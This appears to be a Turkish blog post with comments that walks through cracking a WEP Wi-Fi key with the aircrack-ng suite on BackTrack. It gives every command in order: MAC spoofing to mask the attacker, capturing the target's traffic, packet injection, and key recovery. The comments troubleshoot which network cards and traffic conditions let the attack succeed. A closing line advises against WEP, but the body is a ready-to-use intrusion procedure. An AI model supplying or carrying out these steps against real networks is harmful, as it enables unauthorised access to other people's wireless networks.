Linux BackTrack II live cd linux dağıtımını cd ye yazıp laptopumuza takıyoruz. Bilgisayarımızı cd’ den boot edip logon ekranında root kullanıcı adı toor şifresi ile login oluyoruz.
1. Adım:
Komut satırını açıyoruz
iwconfig
komutunu girip wireless ethernetin hangi interface oldugunu öğreniyoruz.
Not: Ben burada eth0 olduğunu kabul edeceğim ve ona göre komutları gireceğim.
2. Adım:
airmon-ng stop eth0
ifconfig eth0 down
macchanger –mac 00:11:22:33:44:55 eth0
airmon-ng start eth0
3. Adım:
airodump-ng eth0
Not: Ctrl+c tuşuna basıp komutu durdurup bssid’ yi kopyalıyoruz
airodump-ng -c 11 -w test –bssid 00:17:3F:4A:E1:EA eth0
Not: -c’ den sonra kanal numarası ne ise o yazılıyor ben burda örnekolarak 11′ i kullandım bssid’ den sonra kopyaladığımız bssid’ yi yapıştırıyoruz.
4. Adım:
Yeni bir komut satırı açıyoruz
aireplay-ng -1 0 -e mrouter -a 00:17:3F:4A:E1:EA -h 00:11:22:33:44:55 eth0
Not: ilk bssid kopyalığımız ikincisi ise maskelemek için kullanduğımız
5. Adım:
Yeni bir komut satırı daha açıyoruz
aireplay-ng -3 -b 00:17:3F:4A:E1:EA -h 00:11:22:33:44:55 eth0
Not 1: ilk bssid kopyalığımız ikincisi ise maskelemek için kullanduğımız
Not 2: 500 paket elde edildikten sonra 4. Adımı tekrarlıyoruz
6. Adım:
Yaklaşık 100.000 paket sniff ettikten sonra aşağıdaki komutu çalıştırıyoruz
aircrack-ng *.cap
64 bit şifre için aşağıdaki komutu kullanbilirsiniz
aircrack-ng -0 –n 64 *.cap
Bu denemede kullanılan wireless ethernet kartı Intel 2200bg’ dir ve deneme linux ortamında başarılı olmuştur. Ayrıca kullanılan şifreleme yöntemi WEP’ tir.
teşekkürler bora yıldız yada bu dökümanı oluşturan her kimse.. yöntem gayet hızlı ve başarılı bir şekilde çalışıyor…
Aslında bana ağ güveliğinin testi için gerekliydi bu adımlar. Ancak araştırma yaptığımda bulduğum bilgiler parça parça birbiriyle bağlantısızdı. Sadece biraz derleyip toparladım.
Çıkarabileceğimiz tek sonuç Wireless güvenliği için WEP şifrelemesi kullanmamaktır.
bu sayede ertesi gün bende şifre yapılandırmamı wpa ya çevirdim..
🙂
yazınızda intel işlemcili ağ kartıyla yapıldığını söylemişsiniz. fakat intel kartla deneyen arkadaşım başarılı olamamış. kullandığımız ağ kartının yada karşı tarafın kullandığı ağ kartının bu işleme bi etkisi olabilir mi? yada modemin?
aslına bakarsanız çok fazla değişken var
öncelikle atak yaptığınız ağ wep şifresi ile korunuyor olmalı bunun yanında wireless üzerinde trafik olmalı ki paket toplamalısınız. Bir de kullanılan şifleme 64 bit değil 128 bit ise komut satırından bir tanesi değişecek ve toplayacağınız paket sayısı artacak.
intel kartların back injection özelliği kazanabilmesi için linux backtrack kullanmalıyız. eğer karşı tarafta trafik varsa ve siz yeterli paket toplayabildiyseniz şifreyi kıramamak için nedeniniz yok
bilgiler için teşekkür ederim
rica ederim